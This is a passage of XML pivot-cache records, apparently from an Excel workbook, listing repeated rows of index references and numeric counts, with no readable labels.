  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="800"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="800"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="800"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="800"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="801"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="801"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="801"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="801"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="801"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="801"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="801"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="801"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="801"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="801"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="801"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="801"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="801"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="801"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="535"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="535"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="535"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="535"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="535"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="535"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="535"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="535"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="802"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="802"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="802"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="802"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="802"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="802"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="802"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="802"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="802"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="802"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="802"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="802"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="802"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="802"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="803"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="803"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="803"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="803"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="803"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="803"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="803"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="803"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="803"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="803"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="803"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="803"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="803"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="803"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="173"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="173"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="173"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="173"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="75"/>
    <x v="173"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="74"/>
    <x v="173"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="207"/>
    <x v="173"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="25"/>
    <x v="173"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="17"/>
    <x v="173"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="46"/>
    <x v="173"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="286"/>
    <x v="173"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="804"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="804"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="804"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="804"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="804"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="804"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="804"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="804"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="804"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="804"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="804"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="804"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="804"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="804"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="805"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="805"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="805"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="805"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="805"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="805"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="805"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="805"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="805"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="805"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="805"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="805"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="805"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="805"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="806"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="806"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="806"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="806"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="806"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="806"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="806"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="806"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="806"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="806"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="806"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="806"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="806"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="806"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="807"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="807"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="807"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="807"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="807"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="17"/>
    <x v="807"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="50"/>
    <x v="807"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="120"/>
    <x v="807"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="807"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="807"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="807"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="300"/>
    <x v="807"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="807"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="807"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="808"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="808"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="808"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="808"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="808"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="808"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="808"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="808"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="808"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="808"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="808"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="808"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="10"/>
    <x v="808"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="808"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="599"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="599"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="599"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="599"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="599"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="18"/>
    <x v="599"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="599"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="809"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="809"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="809"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="809"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="809"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="809"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="114"/>
    <x v="809"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="213"/>
    <x v="809"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="809"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="809"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="100"/>
    <x v="809"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="161"/>
    <x v="809"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="809"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="809"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="810"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="810"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="810"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="810"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="810"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="810"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="810"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="810"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="810"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="810"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="810"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="810"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="810"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="810"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="515"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="515"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="515"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="811"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="811"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="811"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="811"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="811"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="811"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="811"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="811"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="811"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="811"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="811"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="811"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="811"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="811"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="812"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="812"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="812"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="812"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="812"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="812"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="812"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="812"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="812"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="812"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="812"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="812"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="309"/>
    <x v="812"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="812"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="813"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="813"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="813"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="813"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="813"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="813"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="813"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="813"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="813"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="813"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="813"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="813"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="21"/>
    <x v="813"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="813"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="814"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="814"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="814"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="814"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="814"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="814"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="814"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="814"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="814"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="814"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="814"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="814"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="814"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="814"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="815"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="815"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="815"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="815"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="815"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="815"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="815"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="815"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="815"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="815"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="815"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="815"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="815"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="815"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="682"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="682"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="682"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="682"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="682"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="682"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="816"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="816"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="816"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="816"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="42"/>
    <x v="816"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="816"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="113"/>
    <x v="816"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="453"/>
    <x v="816"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="816"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="816"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="816"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="816"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="816"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="816"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="817"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="817"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="817"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="817"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="817"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="817"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="817"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="817"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="817"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="817"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="817"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="817"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="817"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="817"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="818"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="3"/>
    <x v="818"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="818"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="818"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="15"/>
    <x v="818"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="818"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="818"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="818"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="18"/>
    <x v="818"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="818"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="818"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="818"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="818"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="818"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="819"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="819"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="819"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="819"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="819"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="819"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="24"/>
    <x v="819"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="40"/>
    <x v="819"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="819"/>
